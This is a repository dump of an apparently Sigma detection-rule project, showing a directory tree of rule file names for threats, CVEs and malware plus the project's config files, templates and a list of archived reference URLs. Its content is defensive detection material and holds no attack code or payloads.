│ │ │ └── image_load_apt_lazarus_side_load_activity.yml
│ │ ├── Mint-Sandstorm/
│ │ │ ├── README.md
│ │ │ ├── proc_creation_win_apt_mint_sandstorm_aspera_faspex_susp_child_process.yml
│ │ │ ├── proc_creation_win_apt_mint_sandstorm_log4j_wstomcat_execution.yml
│ │ │ └── proc_creation_win_apt_mint_sandstorm_manage_engine_susp_child_process.yml
│ │ ├── Mustang-Panda-Australia-Campaign/
│ │ │ ├── README.md
│ │ │ └── proc_creation_win_apt_mustang_panda_indicators.yml
│ │ ├── Okta-Support-System-Breach/
│ │ │ ├── README.md
│ │ │ └── okta_apt_suspicious_user_creation.yml
│ │ ├── Onyx-Sleet/
│ │ │ ├── README.md
│ │ │ └── file_event_win_apt_onyx_sleet_indicators.yml
│ │ ├── PaperCut-Print-Management-Exploitation/
│ │ │ ├── README.md
│ │ │ ├── proc_creation_win_papercut_print_management_exploitation_indicators.yml
│ │ │ └── proc_creation_win_papercut_print_management_exploitation_pc_app.yml
│ │ ├── Peach-Sandstorm/
│ │ │ ├── proc_creation_win_apt_peach_sandstorm_indicators.yml
│ │ │ └── proxy_apt_peach_sandstorm_falsefont_backdoor_c2_coms.yml
│ │ └── UNC4841-Barracuda-ESG-Zero-Day-Exploitation/
│ │ ├── README.md
│ │ ├── file_event_lnx_apt_unc4841_exfil_mail_pattern.yml
│ │ ├── file_event_lnx_apt_unc4841_file_indicators.yml
│ │ ├── proc_creation_lnx_apt_unc4841_openssl_connection.yml
│ │ ├── proc_creation_lnx_apt_unc4841_wget_download_compressed_file_tmep_sh.yml
│ │ ├── proc_creation_lnx_apt_unc4841_wget_download_tar_files_direct_ip.yml
│ │ └── proc_creation_lnx_atp_unc4841_seaspy_execution.yml
│ ├── 2024/
│ │ ├── Exploits/
│ │ │ ├── CVE-2024-1212/
│ │ │ │ └── web_exploit_cve_2024_1212_.yml
│ │ │ ├── CVE-2024-1708/
│ │ │ │ ├── file_event_win_exploit_cve_2024_1708_screenconnect.yml
│ │ │ │ └── win_security_exploit_cve_2024_1708_screenconnect.yml
│ │ │ ├── CVE-2024-1709/
│ │ │ │ ├── file_event_win_exploit_cve_2024_1709_user_database_modification_screenconnect.yml
│ │ │ │ ├── web_exploit_cve_2024_1709_screenconnect.yml
│ │ │ │ └── win_security_exploit_cve_2024_1709_user_database_modification_screenconnect.yml
│ │ │ ├── CVE-2024-3094/
│ │ │ │ └── proc_creation_lnx_exploit_cve_2024_3094_sshd_child_process.yml
│ │ │ ├── CVE-2024-3400/
│ │ │ │ ├── file_event_paloalto_globalprotect_exploit_cve_2024_3400_command_inject_file_creation.yml
│ │ │ │ └── paloalto_globalprotect_exploit_cve_2024_3400_command_injection.yml
│ │ │ ├── CVE-2024-35250/
│ │ │ │ └── image_load_exploit_cve_2024_35250_privilege_escalation.yml
│ │ │ ├── CVE-2024-37085/
│ │ │ │ ├── proc_creation_win_exploit_cve_2024_37085_esxi_admins_group_creation.yml
│ │ │ │ └── win_security_exploit_cve_2024_37085_esxi_admins_group.yml
│ │ │ ├── CVE-2024-49113/
│ │ │ │ └── win_application_error_exploit_cve_2024_49113_ldap_nightmare.yml
│ │ │ └── CVE-2024-50623/
│ │ │ └── proc_creation_win_exploit_cve_2024_50623_cleo.yml
│ │ ├── Malware/
│ │ │ ├── CSharp-Streamer/
│ │ │ │ └── image_load_malware_csharp_streamer_dotnet_load.yml
│ │ │ ├── DarkGate/
│ │ │ │ └── file_event_win_malware_darkgate_autoit3_save_temp.yml
│ │ │ ├── Generic/
│ │ │ │ └── file_event_win_malware_generic_creation_configuration_rats.yml
│ │ │ ├── KamiKakaBot/
│ │ │ │ ├── proc_creation_win_malware_kamikakabot_lnk_lure_execution.yml
│ │ │ │ ├── proc_creation_win_malware_kamikakabot_schtasks_persistence.yml
│ │ │ │ └── registry_set_malware_kamikakabot_winlogon_persistence.yml
│ │ │ ├── Lummac-Stealer/
│ │ │ │ └── proc_creation_win_malware_lummac_more_vbc.yml
│ │ │ ├── Raspberry-Robin/
│ │ │ │ ├── image_load_malware_raspberry_robin_side_load_aclui_oleview.yml
│ │ │ │ ├── proc_creation_win_malware_raspberry_robin_rundll32_shell32_cpl_exection.yml
│ │ │ │ └── registry_set_malware_raspberry_robin_internet_settings_zonemap_tamper.yml
│ │ │ └── kapeka/
│ │ │ ├── Kapeka.md
│ │ │ ├── file_event_win_malware_kapeka_backdoor_indicators.yml
│ │ │ ├── image_load_malware_kapeka_backdoor_wll.yml
│ │ │ ├── proc_creation_win_malware_kapeka_backdoor_persistence.yml
│ │ │ ├── proc_creation_win_malware_kapeka_backdoor_rundll32_execution.yml
│ │ │ ├── registry_set_malware_kapeka_backdoor_autorun_persistence.yml
│ │ │ ├── registry_set_malware_kapeka_backdoor_configuration.yml
│ │ │ └── win_security_malware_kapeka_backdoor_scheduled_task_creation.yml
│ │ └── TA/
│ │ ├── DPRK/
│ │ │ └── dns_query_win_apt_dprk_malicious_domains.yml
│ │ ├── FIN7/
│ │ │ └── proc_creation_win_apt_fin7_exploitation_indicators.yml
│ │ ├── Forest-Blizzard/
│ │ │ ├── README.md
│ │ │ ├── file_event_win_apt_forest_blizzard_activity.yml
│ │ │ ├── file_event_win_apt_forest_blizzard_constrained_js.yml
│ │ │ ├── proc_creation_win_apt_forest_blizzard_activity.yml
│ │ │ ├── registry_set_apt_forest_blizzard_custom_protocol_handler.yml
│ │ │ └── registry_set_apt_forest_blizzard_custom_protocol_handler_dll.yml
│ │ └── SlashAndGrab-Exploitation-In-Wild/
│ │ └── file_event_win_apt_unknown_exploitation_indicators.yml
│ ├── 2025/
│ │ ├── Exploits/
│ │ │ ├── CVE-2025-10035/
│ │ │ │ └── proc_creation_win_exploit_cve_2025_10035.yml
│ │ │ ├── CVE-2025-20333/
│ │ │ │ └── proxy_exploit_cve_2025_20333.yml
│ │ │ ├── CVE-2025-24054/
│ │ │ │ └── file_event_win_exploit_cve_2025_24054_library_ms.yml
│ │ │ ├── CVE-2025-30406/
│ │ │ │ └── proc_creation_win_exploit_cve_2025_30406_centrestack_portal_child_process.yml
│ │ │ ├── CVE-2025-31161/
│ │ │ │ └── proc_creation_win_crushftp_susp_child_processes.yml
│ │ │ ├── CVE-2025-31324/
│ │ │ │ ├── file_event_lnx_sap_netweaver_webshell_creation.yml
│ │ │ │ ├── file_event_win_sap_netweaver_webshell_creation.yml
│ │ │ │ ├── proc_creation_lnx_sap_netweaver_susp_child_process.yml
│ │ │ │ ├── proc_creation_win_sap_netweaver_susp_child_process.yml
│ │ │ │ ├── web_lnx_exploit_cve_2025_31324_sap_netviewer_webshell.yml
│ │ │ │ └── web_lnx_exploit_cve_2025_31324_sap_netviewer_webshell_uploaded.yml
│ │ │ ├── CVE-2025-32463/
│ │ │ │ └── file_event_lnx_exploit_cve_2025_32463.yml
│ │ │ ├── CVE-2025-33053/
│ │ │ │ ├── image_load_win_exploit_cve_2025_33053.yml
│ │ │ │ ├── proc_access_win_exploit_cve_2025_33053.yml
│ │ │ │ └── proc_creation_win_exploit_cve_2025_33053.yml
│ │ │ ├── CVE-2025-40551/
│ │ │ │ └── proc_creation_win_exploit_cve_2025_40551.yml
│ │ │ ├── CVE-2025-4427/
│ │ │ │ └── web_invanti_epmm_cve_2025_4427_and_cve_2025_4428.yml
│ │ │ ├── CVE-2025-49144/
│ │ │ │ └── proc_creation_win_exploit_cve_2025_49144.yml
│ │ │ ├── CVE-2025-53770/
│ │ │ │ ├── file_event_win_exploit_cve_2025_53770.yml
│ │ │ │ ├── proc_creation_win_exploit_cve_2025_53770_indicators.yml
│ │ │ │ └── web_win_iis_exploit_cve_2025_53770.yml
│ │ │ ├── CVE-2025-54309/
│ │ │ │ └── proc_creation_win_exploit_cve_2025_54309.yml
│ │ │ ├── CVE-2025-55182/
│ │ │ │ ├── proc_creation_lnx_exploit_cve_2025_55182_susp_nodejs_server_child_process.yml
│ │ │ │ └── proc_creation_win_exploit_cve_2025_55182_susp_nodejs_server_child_process.yml
│ │ │ ├── CVE-2025-57788/
│ │ │ │ └── proc_creation_win_exploit_cve_2025_57788.yml
│ │ │ ├── CVE-2025-57790/
│ │ │ │ └── proc_creation_win_exploit_cve_2025_57790.yml
│ │ │ ├── CVE-2025-57791/
│ │ │ │ └── proc_creation_win_exploit_cve_2025_57791.yml
│ │ │ └── CVE-2025-59287/
│ │ │ ├── proc_creation_win_exploit_cve_2025_59287.yml
│ │ │ └── win_wsus_exploit_cve_2025_59287.yml
│ │ └── Malware/
│ │ ├── Atomic-MacOS-Stealer/
│ │ │ ├── file_event_macos_malware_amos_persistence.yml
│ │ │ └── proc_creation_macos_malware_amos_curl_post.yml
│ │ ├── Grixba/
│ │ │ └── proc_creation_win_malware_grixba_recon.yml
│ │ ├── Katz-Stealer/
│ │ │ ├── dns_query_win_katz_stealer_domain.yml
│ │ │ ├── image_load_win_katz_stealer_payloads.yml
│ │ │ ├── net_dns_katz_stealer_domain.yml
│ │ │ └── zeek_http_katz_stealer_susp_useragent.yml
│ │ ├── Shai-Hulud/
│ │ │ ├── file_event_lnx_mal_shai_hulud_workflow.yml
│ │ │ ├── github_mal_shai_hulud_npm_attack.yml
│ │ │ └── proc_creation_lnx_mal_shai_hululd_exfiltration.yml
│ │ ├── file_event_win_malware_funklocker_ransomware_extension.yml
│ │ └── proc_creation_win_malware_kalambur_curl_socks_tor.yml
│ └── README.md
├── rules-placeholder/
│ ├── README.md
│ ├── cloud/
│ │ ├── aws/
│ │ │ └── cloudtrail/
│ │ │ └── aws_cloudtrail_console_login_success_from_susp_locations.yml
│ │ └── azure/
│ │ ├── audit_logs/
│ │ │ └── azure_ad_account_created_deleted_nonapproved_user.yml
│ │ └── signin_logs/
│ │ ├── azure_ad_account_signin_outside_hours.yml
│ │ ├── azure_privileged_account_no_saw_paw.yml
│ │ ├── azure_privileged_account_sigin_expected_controls.yml
│ │ └── azure_privileged_account_signin_outside_hours.yml
│ └── windows/
│ ├── builtin/
│ │ └── security/
│ │ ├── win_security_admin_logon.yml
│ │ ├── win_security_exploit_cve_2020_1472.yml
│ │ ├── win_security_potential_pass_the_hash.yml
│ │ ├── win_security_remote_registry_management_via_reg.yml
│ │ └── win_security_susp_interactive_logons.yml
│ ├── dns_query/
│ │ └── dns_query_win_wscript_cscript_resolution.yml
│ ├── network_connection/
│ │ └── net_connection_win_susp_rdp_from_domain_controller.yml
│ └── process_creation/
│ └── proc_creation_win_userdomain_variable_enumeration.yml
├── rules-threat-hunting/
│ ├── README.md
│ ├── cloud/
│ │ ├── m365/
│ │ │ └── audit/
│ │ │ ├── microsoft365_susp_email_forwarding_activity.yml
│ │ │ └── microsoft365_susp_inbox_rule_creation_or_update_activity.yml
│ │ └── okta/
│ │ └── okta_password_health_report_query.yml
│ ├── linux/
│ │ ├── file/
│ │ │ └── file_event/
│ │ │ ├── file_event_lnx_python_path_configuration_files.yml
│ │ │ └── file_event_lnx_susp_long_filename_pattern.yml
│ │ └── process_creation/
│ │ ├── proc_creation_lnx_susp_process_termination_via_kill.yml
│ │ └── proc_creation_lnx_susp_running_process_discovery.yml
│ ├── macos/
│ │ ├── file/
│ │ │ └── file_event/
│ │ │ └── file_event_macos_python_path_configuration_files.yml
│ │ └── process_creation/
│ │ └── proc_creation_macos_pbpaste_execution.yml
│ ├── network/
│ │ └── net_dns_low_reputation_etld.yml
│ ├── web/
│ │ └── proxy_generic/
│ │ └── proxy_susp_class_extension_request.yml
│ └── windows/
│ ├── builtin/
│ │ ├── appxdeployment_server/
│ │ │ └── win_appxpackaging_server_successful_package_installation.yml
│ │ ├── firewall_as/
│ │ │ └── win_firewall_as_change_rule.yml
│ │ └── security/
│ │ ├── account_management/
│ │ │ └── win_security_scrcons_remote_wmi_scripteventconsumer.yml
│ │ ├── win_security_file_access_browser_credential.yml
│ │ └── win_security_scheduled_task_deletion.yml
│ ├── create_remote_thread/
│ │ ├── create_remote_thread_win_loadlibrary.yml
│ │ ├── create_remote_thread_win_powershell_generic.yml
│ │ └── create_remote_thread_win_susp_target_shell_application.yml
│ ├── file/
│ │ ├── file_access/
│ │ │ ├── file_access_win_browsers_chromium_sensitive_files.yml
│ │ │ ├── file_access_win_browsers_credential.yml
│ │ │ ├── file_access_win_office_outlook_mail_credential.yml
│ │ │ ├── file_access_win_susp_gpo_access_uncommon_process.yml
│ │ │ ├── file_access_win_susp_reg_and_hive.yml
│ │ │ └── file_access_win_susp_unattend_xml.yml
│ │ ├── file_change/
│ │ │ └── file_change_win_date_changed_to_another_year.yml
│ │ ├── file_delete/
│ │ │ └── file_delete_win_zone_identifier_ads.yml
│ │ ├── file_event/
│ │ │ ├── file_event_win_dump_file_creation.yml
│ │ │ ├── file_event_win_pfx_file_creation.yml
│ │ │ ├── file_event_win_python_path_configuration_files.yml
│ │ │ ├── file_event_win_scheduled_task_creation.yml
│ │ │ ├── file_event_win_susp_binary_dropper.yml
│ │ │ ├── file_event_win_vscode_tunnel_indicators.yml
│ │ │ ├── file_event_win_wdac_policy_creation_in_codeintegrity_folder.yml
│ │ │ └── file_event_win_webdav_tmpfile_creation.yml
│ │ └── file_rename/
│ │ └── file_rename_win_non_dll_to_dll_ext.yml
│ ├── image_load/
│ │ ├── image_load_dll_amsi_uncommon_process.yml
│ │ ├── image_load_dll_bitsproxy_load_by_uncommon_process.yml
│ │ ├── image_load_dll_dbghelp_dbgcore_susp_load.yml
│ │ ├── image_load_dll_system_drawing_load.yml
│ │ ├── image_load_dll_taskschd_by_process_in_potentially_suspicious_location.yml
│ │ ├── image_load_office_excel_xll_load.yml
│ │ ├── image_load_office_word_wll_load.yml
│ │ ├── image_load_win_werfaultsecure_dbgcore_dbghelp_load.yml
│ │ └── image_load_wmi_module_load_by_uncommon_process.yml
│ ├── network_connection/
│ │ ├── net_connection_win_dfsvc_non_local_ip.yml
│ │ ├── net_connection_win_dfsvc_uncommon_ports.yml
│ │ ├── net_connection_win_dllhost_non_local_ip.yml
│ │ ├── net_connection_win_hh_http_connection.yml
│ │ ├── net_connection_win_msiexec_http.yml
│ │ ├── net_connection_win_powershell_network_connection.yml
│ │ ├── net_connection_win_susp_azurefd_connection.yml
│ │ └── net_connection_win_susp_initaited_public_folder.yml
│ ├── pipe_created/
│ │ └── pipe_created_sysinternals_psexec_default_pipe.yml
│ ├── powershell/
│ │ ├── powershell_classic/
│ │ │ ├── posh_pc_alternate_powershell_hosts.yml
│ │ │ └── posh_pc_bxor_operator_usage.yml
│ │ ├── powershell_module/
│ │ │ └── posh_pm_susp_netfirewallrule_recon.yml
│ │ └── powershell_script/
│ │ ├── posh_ps_compress_archive_usage.yml
│ │ ├── posh_ps_email_forwarding_activity.yml
│ │ ├── posh_ps_inbox_rule_creation_or_update_activity.yml
│ │ ├── posh_ps_mailbox_access.yml
│ │ ├── posh_ps_new_netfirewallrule_allow.yml
│ │ ├── posh_ps_new_smbmapping_quic.yml
│ │ ├── posh_ps_registry_reconnaissance.yml
│ │ ├── posh_ps_remove_item_path.yml
│ │ ├── posh_ps_send_mailmessage.yml
│ │ ├── posh_ps_token_obfuscation.yml
│ │ ├── posh_ps_win_api_functions_access.yml
│ │ └── posh_ps_win_api_library_access.yml
│ ├── process_access/
│ │ ├── proc_access_win_lsass_powershell_access.yml
│ │ ├── proc_access_win_lsass_susp_source_process.yml
│ │ ├── proc_access_win_lsass_uncommon_access_flag.yml
│ │ └── proc_access_win_susp_potential_shellcode_injection.yml
│ ├── process_creation/
│ │ ├── proc_creation_win_7zip_password_extraction.yml
│ │ ├── proc_creation_win_attrib_system.yml
│ │ ├── proc_creation_win_boinc_execution.yml
│ │ ├── proc_creation_win_cmd_redirect.yml
│ │ ├── proc_creation_win_cmd_set_prompt_abuse.yml
│ │ ├── proc_creation_win_conhost_headless_execution.yml
│ │ ├── proc_creation_win_csc_compilation.yml
│ │ ├── proc_creation_win_curl_download.yml
│ │ ├── proc_creation_win_curl_execution.yml
│ │ ├── proc_creation_win_curl_fileupload.yml
│ │ ├── proc_creation_win_curl_useragent.yml
│ │ ├── proc_creation_win_dfsvc_child_processes.yml
│ │ ├── proc_creation_win_diskshadow_child_process.yml
│ │ ├── proc_creation_win_diskshadow_script_mode.yml
│ │ ├── proc_creation_win_explorer_child_of_shell_process.yml
│ │ ├── proc_creation_win_extexport_execution.yml
│ │ ├── proc_creation_win_findstr_password_recon.yml
│ │ ├── proc_creation_win_iexpress_execution.yml
│ │ ├── proc_creation_win_microsoft_workflow_compiler_execution.yml
│ │ ├── proc_creation_win_mode_codepage_change.yml
│ │ ├── proc_creation_win_net_execution.yml
│ │ ├── proc_creation_win_net_quic.yml
│ │ ├── proc_creation_win_office_svchost_parent.yml
│ │ ├── proc_creation_win_powershell_abnormal_commandline_size.yml
│ │ ├── proc_creation_win_powershell_crypto_namespace.yml
│ │ ├── proc_creation_win_powershell_import_module.yml
│ │ ├── proc_creation_win_powershell_new_netfirewallrule_allow.yml
│ │ ├── proc_creation_win_powershell_susp_child_processes.yml
│ │ ├── proc_creation_win_regsvr32_dllregisterserver_exec.yml
│ │ ├── proc_creation_win_remote_access_tools_action1_code_exec_and_remote_sessions.yml
│ │ ├── proc_creation_win_remote_access_tools_ammyy_admin_execution.yml
│ │ ├── proc_creation_win_remote_access_tools_anyviewer_shell_exec.yml
│ │ ├── proc_creation_win_remote_access_tools_screenconnect_child_proc.yml
│ │ ├── proc_creation_win_rundll32_by_ordinal.yml
│ │ ├── proc_creation_win_rundll32_dllregisterserver.yml
│ │ ├── proc_creation_win_sc_query.yml
│ │ ├── proc_creation_win_schtasks_creation_from_susp_parent.yml
│ │ ├── proc_creation_win_susp_cli_obfuscation_unicode.yml
│ │ ├── proc_creation_win_susp_compression_params.yml
│ │ ├── proc_creation_win_susp_elevated_system_shell.yml
│ │ ├── proc_creation_win_susp_event_log_query.yml
│ │ ├── proc_creation_win_susp_execution_from_guid_folder_names.yml
│ │ ├── proc_creation_win_susp_execution_path_webserver.yml
│ │ ├── proc_creation_win_susp_exfil_and_tunneling_tool_execution.yml
│ │ ├── proc_creation_win_susp_file_permission_modifications.yml
│ │ ├── proc_creation_win_susp_ntfs_short_name_path_use_cli.yml
│ │ ├── proc_creation_win_susp_open_html_file_from_download_folder.yml
│ │ ├── proc_creation_win_susp_parent_execute_itself.yml
│ │ ├── proc_creation_win_susp_script_exec_from_compressed_parent.yml
│ │ ├── proc_creation_win_taskkill_execution.yml
│ │ ├── proc_creation_win_tasklist_basic_execution.yml
│ │ ├── proc_creation_win_webdav_process_execution.yml
│ │ ├── proc_creation_win_winscp_command_open_ftp.yml
│ │ ├── proc_creation_win_winscp_portable_execution.yml
│ │ ├── proc_creation_win_wmic_recon_system_info.yml
│ │ ├── proc_creation_win_wscript_cscript_script_exec.yml
│ │ ├── proc_creation_win_wsl_arbitrary_command_execution.yml
│ │ └── proc_creation_win_wusa_cab_files_extraction.yml
│ └── registry/
│ ├── registry_event/
│ │ └── registry_event_scheduled_task_creation.yml
│ └── registry_set/
│ ├── registry_set_office_trusted_location.yml
│ ├── registry_set_powershell_crypto_namespace.yml
│ ├── registry_set_runmru_command_execution.yml
│ ├── registry_set_service_image_path_user_controlled_folder.yml
│ └── registry_set_shell_context_menu_tampering.yml
├── tests/
│ ├── check-baseline-local.sh
│ ├── deprecated_rules.py
│ ├── logsource.json
│ ├── promote_rules_status.py
│ ├── reference-archiver.py
│ ├── regression_tests_runner.py
│ ├── rule-references.txt
│ ├── sigma-package-release.py
│ ├── sigma_cli_conf.yml
│ ├── test_logsource.py
│ ├── test_rules.py
│ ├── thor.yml
│ └── validate-sigma-schema/
│ ├── sigma-schema.json
│ └── validate.py
└── unsupported/
├── README.md
├── cloud/
│ ├── aws_ec2_download_userdata.yml
│ ├── aws_enum_backup.yml
│ ├── aws_enum_listing.yml
│ ├── aws_enum_network.yml
│ ├── aws_enum_storage.yml
│ ├── aws_lambda_function_created_or_invoked.yml
│ ├── aws_macic_evasion.yml
│ ├── aws_ses_messaging_enabled.yml
│ └── azure_aad_secops_signin_failure_bad_password_threshold.yml
├── linux/
│ ├── lnx_auditd_cve_2021_3156_sudo_buffer_overflow.yml
│ ├── lnx_auditd_cve_2021_3156_sudo_buffer_overflow_brutforce.yml
│ ├── lnx_auditd_cve_2021_4034.yml
│ ├── lnx_auditd_debugfs_usage.yml
│ ├── lnx_auditd_omigod_scx_runasprovider_executescript.yml
│ ├── lnx_auth_susp_failed_logons_single_source.yml
│ └── lnx_shell_priv_esc_prep.yml
├── network/
│ ├── net_dns_c2_detection.yml
│ ├── net_dns_high_bytes_out.yml
│ ├── net_dns_high_null_records_requests_rate.yml
│ ├── net_dns_high_requests_rate.yml
│ ├── net_dns_high_subdomain_rate.yml
│ ├── net_dns_high_txt_records_requests_rate.yml
│ ├── net_dns_large_domain_name.yml
│ ├── net_firewall_high_dns_bytes_out.yml
│ ├── net_firewall_high_dns_requests_rate.yml
│ ├── net_firewall_susp_network_scan_by_ip.yml
│ ├── net_firewall_susp_network_scan_by_port.yml
│ └── net_possible_dns_rebinding.yml
├── other/
│ └── modsec_mulitple_blocks.yml
├── web/
│ └── web_multiple_susp_resp_codes_single_source.yml
├── windows/
│ ├── dns_query_win_possible_dns_rebinding.yml
│ ├── driver_load_invoke_obfuscation_clip+_services.yml
│ ├── driver_load_invoke_obfuscation_obfuscated_iex_services.yml
│ ├── driver_load_invoke_obfuscation_stdin+_services.yml
│ ├── driver_load_invoke_obfuscation_var+_services.yml
│ ├── driver_load_invoke_obfuscation_via_compress_services.yml
│ ├── driver_load_invoke_obfuscation_via_rundll_services.yml
│ ├── driver_load_invoke_obfuscation_via_stdin_services.yml
│ ├── driver_load_invoke_obfuscation_via_use_clip_services.yml
│ ├── driver_load_invoke_obfuscation_via_use_mshta_services.yml
│ ├── driver_load_invoke_obfuscation_via_use_rundll32_services.yml
│ ├── driver_load_invoke_obfuscation_via_var++_services.yml
│ ├── driver_load_meterpreter_or_cobaltstrike_getsystem_service_installation.yml
│ ├── driver_load_tap_driver_installation.yml
│ ├── file_event_executable_and_script_creation_by_office_using_file_ext.yml
│ ├── image_load_mimikatz_inmemory_detection.yml
│ ├── posh_ps_cl_invocation_lolscript_count.yml
│ ├── posh_ps_cl_mutexverifiers_lolscript_count.yml
│ ├── proc_creation_win_correlation_apt_silence_downloader_v3.yml
│ ├── proc_creation_win_correlation_apt_turla_commands_medium.yml
│ ├── proc_creation_win_correlation_dnscat2_powershell_implementation.yml
│ ├── proc_creation_win_correlation_multiple_susp_cli.yml
│ ├── proc_creation_win_correlation_susp_builtin_commands_recon.yml
│ ├── sysmon_always_install_elevated_msi_spawned_cmd_and_powershell_spawned_processes.yml
│ ├── sysmon_always_install_elevated_parent_child_correlated.yml
│ ├── sysmon_non_priv_program_files_move.yml
│ ├── sysmon_process_reimaging.yml
│ ├── win_access_fake_files_with_stored_credentials.yml
│ ├── win_apt_apt29_tor.yml
│ ├── win_dumping_ntdsdit_via_dcsync.yml
│ ├── win_dumping_ntdsdit_via_netsync.yml
│ ├── win_kernel_and_3rd_party_drivers_exploits_token_stealing.yml
│ ├── win_mal_service_installs.yml
│ ├── win_metasploit_or_impacket_smb_psexec_service_install.yml
│ ├── win_possible_privilege_escalation_using_rotten_potato.yml
│ ├── win_remote_schtask.yml
│ ├── win_remote_service.yml
│ ├── win_security_global_catalog_enumeration.yml
│ ├── win_security_rare_schtasks_creations.yml
│ ├── win_security_susp_failed_logons_explicit_credentials.yml
│ ├── win_security_susp_failed_logons_single_process.yml
│ ├── win_security_susp_failed_logons_single_source.yml
│ ├── win_security_susp_failed_logons_single_source2.yml
│ ├── win_security_susp_failed_logons_single_source_kerberos.yml
│ ├── win_security_susp_failed_logons_single_source_kerberos2.yml
│ ├── win_security_susp_failed_logons_single_source_kerberos3.yml
│ ├── win_security_susp_failed_logons_single_source_ntlm.yml
│ ├── win_security_susp_failed_logons_single_source_ntlm2.yml
│ ├── win_security_susp_failed_remote_logons_single_source.yml
│ ├── win_security_susp_multiple_files_renamed_or_deleted.yml
│ ├── win_security_susp_samr_pwset.yml
│ ├── win_susp_failed_hidden_share_mount.yml
│ ├── win_suspicious_werfault_connection_outbound.yml
│ ├── win_system_rare_service_installs.yml
│ └── win_taskscheduler_rare_schtask_creation.yml
└── zeek/
├── zeek_dce_rpc_domain_user_enumeration.yml
└── zeek_http_exfiltration_compressed_files.yml
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitattributes
================================================
# Set the default behavior, in case people don't have core.autocrlf set.
* text=lf
# Explicitly declare text files you want to always be normalized and converted
# to native line endings on checkout.
*.c text
*.h text
*.csv text
*.sh text
*.py text
# Declare files that will always have CRLF line endings on checkout.
*.sln text eol=crlf
# Denote all files that are truly binary and should not be modified.
*.png binary
*.jpg binary
# force lf for Sigma rule
*.yml text eol=lf
================================================
FILE: .github/FUNDING.yml
================================================
# These are supported funding model platforms
github: [thomaspatzke]
patreon: # Replace with a single Patreon username
open_collective: # Replace with a single Open Collective username
ko_fi: # Replace with a single Ko-fi username
tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
liberapay: # Replace with a single Liberapay username
issuehunt: # Replace with a single IssueHunt username
otechie: # Replace with a single Otechie username
lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry
custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']
================================================
FILE: .github/ISSUE_TEMPLATE/false_positive_report.yml
================================================
name: "False Positive Report"
description: Report false positives with SIGMA rules
labels: [False-Positive]
assignees:
- nasbench
body:
- type: input
attributes:
label: Rule UUID
placeholder: "f3be1b1d-eb3c-4ab1-b5e5-81e330fa2cd0"
description: |
You can copy the rule id from the `id` field in the rule.
validations:
required: true
- type: textarea
attributes:
label: Example EventLog
description: An event log example of the false positive in question
placeholder: |
SubjectLogonId 0x1d3f2a
NewProcessId 0x5f14
NewProcessName C:\Windows\System32\dllhost.exe
TokenElevationType %%1937
ProcessId 0x1270
CommandLine dllhost
TargetUserSid S-1-0-0
TargetUserName -
TargetDomainName -
TargetLogonId 0x0
ParentProcessName C:\Windows\System32\cmd.exe
validations:
required: true
- type: textarea
attributes:
label: Description
placeholder: This is just a placeholder description
description: |
Provide any additional information that you might think is helpful
validations:
required: true
================================================
FILE: .github/ISSUE_TEMPLATE/rule_proposal.md
================================================
---
name: "Rule Proposal"
about: Rule Idea Proposal
title: ''
labels: Rule
assignees:
- nasbench
---
### Description of the Idea of the Rule
### Public References / Example Event Log
================================================
FILE: .github/PULL_REQUEST_TEMPLATE.md
================================================
### Summary of the Pull Request
### Changelog
### Example Log Event
### Fixed Issues
### SigmaHQ Rule Creation Conventions
- If your PR adds new rules, please consider following and applying these [conventions](https://github.com/SigmaHQ/sigma-specification/blob/main/sigmahq/)
================================================
FILE: .github/labeler.yml
================================================
Rules:
- changed-files:
- any-glob-to-any-file:
- 'deprecated/**'
- 'rules/**'
- 'rules-compliance/**'
- 'rules-dfir/**'
- 'rules-emerging-threats/**'
- 'rules-placeholder/**'
- 'rules-threat-hunting/**'
Emerging-Threats:
- changed-files:
- any-glob-to-any-file: 'rules-emerging-threats/**'
Threat-Hunting:
- changed-files:
- any-glob-to-any-file: 'rules-threat-hunting/**'
MacOS:
- changed-files:
- any-glob-to-any-file:
- 'rules/macos/**'
- 'rules-compliance/macos/**'
- 'rules-dfir/macos/**'
- 'rules-emerging-threats/macos/**'
- 'rules-placeholder/macos/**'
- 'rules-threat-hunting/macos/**'
Windows:
- changed-files:
- any-glob-to-any-file:
- 'rules/windows/**'
- 'rules-compliance/windows/**'
- 'rules-dfir/windows/**'
- 'rules-emerging-threats/windows/**'
- 'rules-placeholder/windows/**'
- 'rules-threat-hunting/windows/**'
Linux:
- changed-files:
- any-glob-to-any-file:
- 'rules/linux/**'
- 'rules-compliance/linux/**'
- 'rules-dfir/linux/**'
- 'rules-emerging-threats/linux/**'
- 'rules-placeholder/linux/**'
- 'rules-threat-hunting/linux/**'
Maintenance:
- changed-files:
- any-glob-to-any-file:
- 'documentation/**'
- 'tests/**'
- '.github/**'
- 'README.md'
- 'Releases.md'
Review Needed:
- changed-files:
- any-glob-to-any-file: '**'
================================================
FILE: .github/latest_archiver_output.md
================================================
# Reference Archiver Results
Last Execution: 2026-03-01 02:19:10
### Archiver Script Results
#### Newly Archived References
N/A
#### Already Archived References
- https://gtfobins.github.io/gtfobins/curl/
- https://kostas-ts.medium.com/detecting-abuse-of-openedrs-permissive-edr-trial-a-security-researcher-s-perspective-fc55bf53972c
- https://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/
- https://thehackernews.com/2025/03/unpatched-windows-zero-day-flaw.html
- https://medium.com/@boutnaru/the-windows-foreniscs-journey-run-mru-run-dialog-box-most-recently-used-57375a02d724
- https://github.com/clearvector/lambda-spy
- https://fourcore.io/blogs/threat-hunting-browser-credential-stealing
- https://docs.python.org/2/library/simplehttpserver.html
- https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-to-connect-monitor-federation-changes
- https://thedfirreport.com/2025/06/30/hide-your-rdp-password-spray-leads-to-ransomhub-deployment/
- https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc#rds-modifydbinstance
- https://www.chrisfarris.com/post/effective-aws-ransomware/
- https://github.com/dsnezhkov/TruffleSnout/blob/7c2f22e246ef704bc96c396f66fa854e9ca742b9/TruffleSnout/Docs/USAGE.md
- https://nvd.nist.gov/vuln/detail/CVE-2025-2825
- https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger/
- https://learn.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support
